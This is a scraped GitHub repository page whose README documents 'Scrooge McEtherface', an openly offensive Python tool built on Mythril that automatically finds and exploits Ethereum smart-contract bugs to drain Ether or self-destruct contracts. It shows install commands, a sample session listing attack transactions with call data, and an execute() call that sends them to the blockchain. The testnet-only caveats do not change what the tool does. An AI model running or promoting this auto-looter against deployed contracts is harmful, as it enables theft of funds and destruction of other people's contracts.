Skip to content
Attack tool that loots Ether from vulnerable smart contracts
Python
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
scmf Add __init__.py Jul 6, 2019
static
.gitignore Add venv local folder in gitignore. Jul 7, 2019
LICENSE Add license Nov 27, 2018
README.md Update README.md Jul 2, 2019
config.ini.example Add more config options Jul 6, 2019
epic.py Initial commit Nov 27, 2018
requirements.txt Make compatible with newer Mythril Jun 23, 2019
scrooge Formatting Jul 6, 2019

README.md

Scrooge McEtherface

Discord

Scrooge McEtherface is an Ethereum auto-looter based on Mythril. It exploits instances of Ether theft and self-destruction caused by various issues including integer arithmetic bugs, exposed initialization functions and others. Use at your own peril.

Installation

$ git clone https://github.com/b-mueller/scrooge-mcetherface
$ cd scrooge-mcetherface
$ pip install -r requirements.txt
$ cp config.ini.example config.ini

Python 3.5 or higher is required. Set up your RPC URL and Ethereum address in config.ini. The easiest way to test is using Ganache.

The symbolic_tx_count parameter sets a bound on the number of transactions being explored.

Usage

Start a session by running:

$ ./scrooge <address>

This will analyze the smart contract at the target address, output the vulnerabilites found and spawn a Python shell:

$ ./scrooge 0x3b1d02336205d1f22961c0f462abfe083e515921
Scrooge McEtherface at your service.
Analyzing 0x3B1D02336205D1F22961C0F462aBfE083E515921 over 2 transactions.
Found 2 attacks:

ATTACK 0: Anyone can withdraw ETH from the contract account.
  0: Call data: 0xff9913e8 bebebebebebebebebebebebe7752B465f7452bF49B8A5f43977Efb261060D2Ef, call value: 0x0
  1: Call data: 0x6aba6fa1 , call value: 0x0

ATTACK 1: The contract can be killed by anyone.
  0: Call data: 0xff9913e8 bebebebebebebebebebebebe7752B465f7452bF49B8A5f43977Efb261060D2Ef, call value: 0x0
  1: Call data: 0xc96cd46f , call value: 0x0

Python 3.6.3 (default, Jan  8 2018, 08:49:07) 
(InteractiveConsole)
>>> 

You now have access to a list of Raid objects, each of which represents a sequence of transactions that exploit a bug.

>>> r = raids[0]
>>> print(r.pretty()) 
Anyone can withdraw ETH from the contract account.
  0: Call data: 0xff9913e8 bebebebebebebebebebebebe7752B465f7452bF49B8A5f43977Efb261060D2Ef, call value: 0x0
  1: Call data: 0x6aba6fa1 , call value: 0x0

Use execute() to send the transactions to the blockchain:

>>>  r.execute()
Transaction sent successfully, tx-hash: 0x93f4a72d3ce897c4525a336249f32ae0704f6c0fed6b7b935801d5c7e68ca4b9. Waiting for transaction to be mined...
Transaction sent successfully, tx-hash: 0x21d1e77f6f629377ac227ec2e33f78b1d073c175826c0b161265121a74c2393b. Waiting for transaction to be mined...
True

This returns True if Ether was successfully withdrawn from the target account.

Support

No support for this tool exists whatsoever.

Important Notes

  • This is a weekend project that hasn't been extensively tested. Don't use it on mainnet.
  • Act responsibly and don't accidentally kill anyone else's contract.
  • Use only on testnet and at your own risk.
You can’t perform that action at this time.